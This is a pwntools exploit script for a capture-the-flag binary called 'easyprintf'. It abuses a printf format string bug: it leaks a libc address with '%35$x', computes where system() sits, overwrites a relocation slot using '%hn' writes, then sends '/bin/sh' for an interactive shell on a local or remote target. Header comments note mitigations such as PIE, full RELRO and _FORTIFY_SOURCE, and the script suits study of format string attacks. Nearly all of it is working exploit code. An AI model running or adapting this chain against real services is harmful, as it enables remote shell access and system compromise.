# pwntools script for the CTF challenge binary './easyprintf' (32-bit, i386).
# Vulnerability class exercised: user input is used directly as a printf
# format string, which both leaks stack contents ('%x') and performs writes
# ('%hn'). Review notes (defender's view): the hard-coded slot address
# 0x0804c014 suggests a non-PIE binary, and overwriting a relocation slot at
# runtime suggests full RELRO is not enabled; PIE, full RELRO and
# _FORTIFY_SOURCE (which rejects '%n'-family writes) each break this chain,
# and the root defect is passing untrusted input as the format argument.
from pwn import *
import sys
import time

context.arch = 'i386'

# Local run (no arguments) with verbose I/O logging; otherwise connect to
# the HOST PORT given on the command line.
if len(sys.argv) < 2:
    p = process('./easyprintf')
    context.log_level = 'debug'
else:
    p = remote(sys.argv[1], int(sys.argv[2]))

# Step 1: leak. '%35$x' prints the 35th positional printf argument as hex.
p.writeline("%35$x")
ret = p.recv(2048)
# The first 8 hex digits of the reply are taken as the leaked value; the
# -241 rebases it to __libc_start_main (presumably the leaked word is a
# return address 241 bytes into that function — confirm against the
# 'readelf ... grep "main@"' note below).
main_base = int(ret[0:8], 16) - 241
# Symbol offsets are read from a local libc copy; the remote target is
# assumed to run this exact build (libc-2.27, i386) — TODO confirm.
libc = ELF('/lib/i386-linux-gnu/libc-2.27.so')
# Runtime address of system(): rebased __libc_start_main minus its own
# offset plus system's offset.
sysaddr = main_base - libc.symbols['__libc_start_main'] + libc.symbols['system']
# readelf -a /lib/i386-linux-gnu/libc-2.27.so |grep "main@"
print("%x" % sysaddr)

# Step 2: overwrite. 0x0804c014 is a relocation slot of the binary (per the
# 'readelf -r easyprintf' note below), named here as printf's; it is written
# as two 16-bit halves at printfaddr and printfaddr + 2.
printfaddr = 0x0804c014
log.info('start send')
dest = p32(printfaddr) # readelf -r easyprintf
dest2 = p32(printfaddr + 2)
# Padding widths: the two packed addresses already account for 8 output
# bytes, so 'low' is the low half of sysaddr less 8; 'high' is the extra
# width needed for the running count to reach the high half of sysaddr.
low = (sysaddr & 0xffff)-8
high = (sysaddr>>16 & 0xffff)-low+8
print(low, high)
# '%8$hn' and '%7$hn' store the low 16 bits of the current output count
# through the 8th and 7th positional arguments; which of dest/dest2 each
# index reaches depends on where this input lands on the stack — target
# specific, not derivable from the script alone.
payload = dest + dest2 + (b'%%.%dx' % low) + b'%8$hn' + (b'%%.%dx' % high) + b'%7$hn'
print(payload)
p.writeline(payload)
log.info('send over')
sleep(2)
# Step 3: with the slot redirected, the next input line is presumably
# handed to system() by the program's own call path.
payload = '/bin/sh'
p.writeline(payload)
log.info('get shell!!')
p.interactive()